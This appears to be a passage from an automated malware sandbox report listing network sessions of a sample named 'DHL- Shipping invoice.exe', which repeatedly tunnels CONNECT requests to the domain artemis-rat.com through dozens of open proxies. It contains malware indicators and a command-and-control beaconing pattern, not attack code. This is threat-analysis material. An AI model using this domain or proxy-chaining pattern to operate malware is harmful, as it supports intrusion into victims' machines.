                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            571192.168.2.451766125.228.94.19941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.127039909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            572192.168.2.451951172.67.38.96806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.128477097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.215905905 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            573192.168.2.45033237.193.40.1610806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.132942915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            574192.168.2.45183188.99.138.2152796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.133325100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            575192.168.2.451740102.132.53.15080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.133554935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            576192.168.2.451669106.105.218.244806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.134130001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            577192.168.2.4518505.78.65.91806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.134424925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.749999046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.301542044 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                            Content-Type: text/html
                            Connection: close
                            Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                            Data Ascii: Backend not available


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            578192.168.2.451865184.178.172.1741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.135624886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            579192.168.2.451874134.209.29.12080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.138705969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            580192.168.2.451624103.66.177.17322516484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.216079950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.062633991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.359363079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            581192.168.2.45182831.43.158.10888886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.218976021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            582192.168.2.451131162.214.121.1189896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.219710112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.343660116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453402042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.547014952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.640624046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:37.640439987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.656033039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:13.656197071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:01.718574047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            583192.168.2.45115198.175.31.19541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.219806910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            584192.168.2.45187891.189.177.19031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.220959902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.559288025 CET1286INHTTP/1.1 403 Forbidden
                            Server: squid/5.7
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3629
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            Vary: Accept-Language
                            Content-Language: en
                            X-Cache: MISS from lb1
                            X-Cache-Lookup: NONE from lb1:3128
                            Via: 1.1 lb1 (squid/5.7)
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            585192.168.2.451734103.83.232.122806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.222968102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.608268023 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            586192.168.2.451822190.114.253.21033896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.223469019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            587192.168.2.45194098.181.137.8041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.223768950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            588192.168.2.45185594.177.106.17823246484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.223931074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            589192.168.2.45193251.89.173.40515116484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.224339008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.749998093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.447596073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.640755892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.844067097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            590192.168.2.4512225.161.219.1342286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.224509001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.318290949 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            591192.168.2.451189159.65.184.81806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.224570036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.250016928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.266695976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.359424114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.359349966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:37.452913046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.562293053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:13.562329054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:01.562274933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            592192.168.2.4517918.222.175.210505546484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.225107908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            593192.168.2.451788171.250.221.19110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.228097916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            594192.168.2.451122161.97.163.52457256484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.228097916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
